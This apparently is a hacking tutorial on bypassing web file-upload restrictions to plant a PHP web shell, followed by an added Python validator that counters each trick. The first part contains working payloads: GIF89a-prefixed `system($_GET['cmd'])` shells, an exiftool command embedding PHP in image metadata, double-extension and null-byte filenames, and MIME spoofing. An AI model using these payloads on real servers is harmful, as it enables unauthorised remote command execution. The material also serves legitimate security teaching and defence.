Bypass File Upload Restrictions on Web Apps to Pop a Shell

Many dynamic websites allow their users to upload files: images, songs, movies, or anything else specific to the site. Facebook and LinkedIn, for example, let users upload profile pictures and resumes. File uploading is crucial for many web applications, and at the same time it's a big risk if proper security controls are not implemented on file uploads.

Don’t Miss: How To Get Root By Uploading a Shell to a Web Server (Backdoor Image)

There are various techniques hackers use to bypass and beat file upload restrictions and pop a shell.

Introduction

Today, we'll discuss how a hacker can make use of an unrestricted file upload vulnerability to compromise websites and servers.

Before getting started, it is important to know the basic details about web shells and file upload vulnerabilities. Attackers use web shells for various operations such as executing shell commands, deleting files, creating files, downloading files, etc.

Often it is possible to upload a reverse shell without bypassing any filters or restrictions at all.

Bypassing Blacklists

In blacklisting, certain file extensions are explicitly prohibited from being uploaded to the server. This might seem like an optimal solution to protect your server from getting infected, but under certain conditions it is possible to bypass it.

File Extensions

Developers may blacklist certain file extensions and prevent users from uploading files that are considered dangerous for the server. But this can be bypassed by changing some strings in the extension so that the payload or web shell is still uploaded and executed.

Type         Extensions
PHP          .pht, .phtml, .php, .php3, .php4, .php5, .php6, .inc
JSP          .jsp, .jspx, .jsw, .jsv, .jspf
Perl         .pl, .pm, .cgi, .lib
ASP          .asp, .aspx
ColdFusion   .cfm, .cfml, .cfc, .dbm

In some cases changing the extension alone will not do the trick; instead you have to vary the case of the extension, like this:

.pHp, .Php, .phP

Bypassing Whitelists

In whitelisting, the server accepts only specific extensions. For example, a website where you have to upload a profile picture might accept only JPG, JPEG, or PNG files.

Apache allows files to be uploaded with double extensions and may process them according to any of those extensions. That means we can trick the server into accepting a shell that also has a PNG extension at the end:

shell.php.png
shell.php%00.png
shell.php\x00.jpg

Another way to bypass whitelisting is to manipulate the file type headers.

If a website accepts images, it will usually also accept GIF images. We can prepend GIF89a (the GIF file signature) to trick the server into accepting the shell as an image:

GIF89a; <?php system($_GET['cmd']); ?>

GIF89a;
<?
system($_GET['cmd']); # shellcode goes here
?>

EXIF Data

This method bypasses file upload restrictions by utilizing the EXIF data in an image. A comment that contains PHP code will be executed by the server when the image is later processed as PHP.

You can do this with GIMP or ExifTool:

exiftool -Comment='<?php echo "<pre>"; system($_GET["cmd"]); ?>' image.png
mv image.png image.php.png

MIME-type

Blacklisting MIME types is also a method of file upload validation. It may be bypassed by intercepting the POST request on the way to the server and modifying the MIME type.

Normal PHP MIME type:

Content-type: application/x-php

Replace with

Content-type: image/jpeg

Other Bypassing Methods

In some situations, a limit on the length of the content can also get in the way of uploading the file. For that, the PHP shell can be shortened like this (backticks are PHP's shell-execution operator):

<?=`$_GET[x]`?>
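As an added, defensive example that is not part of the original post, here is an upload validator for an assumed profile-picture form (Python, with an assumed policy of PNG/JPG/GIF only) that closes each gap described above: it lower-cases the name and allows exactly one extension, rejects raw and encoded null bytes, refuses to treat the client's Content-Type as proof of anything, checks the file's magic bytes, refuses an image header that is followed by a PHP open tag, and stores the file under a server-generated name.

```python
import os
import re
import secrets

# Assumed upload policy: canonical extension -> (expected Content-Type,
# accepted magic-byte signatures). The signatures are the real file headers.
ALLOWED = {
    "png": ("image/png", [b"\x89PNG\r\n\x1a\n"]),
    "jpg": ("image/jpeg", [b"\xff\xd8\xff"]),
    "gif": ("image/gif", [b"GIF87a", b"GIF89a"]),
}
SAFE_STEM = re.compile(r"^[a-z0-9_-]{1,64}$")

def validate_upload(filename: str, content: bytes, claimed_type: str) -> str:
    """Return a server-chosen storage name or raise ValueError.

    Each check targets one trick from the text: null bytes (raw or %00), mixed-case
    and double extensions, a forged Content-Type, and an image header before PHP code."""
    if "\x00" in filename or "%00" in filename:
        raise ValueError("null byte in filename")
    base = os.path.basename(filename.replace("\\", "/"))
    parts = base.lower().split(".")          # lower-casing defeats .pHp / .Php
    if len(parts) != 2 or not SAFE_STEM.match(parts[0]):
        raise ValueError("expected name.ext with exactly one extension")
    ext = "jpg" if parts[1] == "jpeg" else parts[1]
    if ext not in ALLOWED:
        raise ValueError("extension not allowed: " + parts[1])
    mime, signatures = ALLOWED[ext]
    # Content-Type is attacker-controlled: a mismatch is rejected, but a match proves nothing.
    if claimed_type.split(";")[0].strip().lower() != mime:
        raise ValueError("Content-Type does not match extension")
    if not any(content.startswith(sig) for sig in signatures):
        raise ValueError("content does not start with a " + ext + " header")
    # "GIF89a" followed by "<?php" passes the header check, so also refuse PHP open tags;
    # this is a coarse backstop, the durable controls are re-encoding and storing outside the web root.
    if b"<?php" in content or b"<?=" in content:
        raise ValueError("embedded PHP open tag")
    # Never reuse the user's filename; the extension is fixed by policy, not by the client.
    return secrets.token_hex(16) + "." + ext

def is_rejected(filename: str, content: bytes, claimed_type: str) -> bool:
    """True when validate_upload refuses the file."""
    try:
        validate_upload(filename, content, claimed_type)
    except ValueError:
        return True
    return False
```

Even with these checks, serve the upload directory with script execution disabled, since validation alone cannot make a user-controlled byte stream safe to execute.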
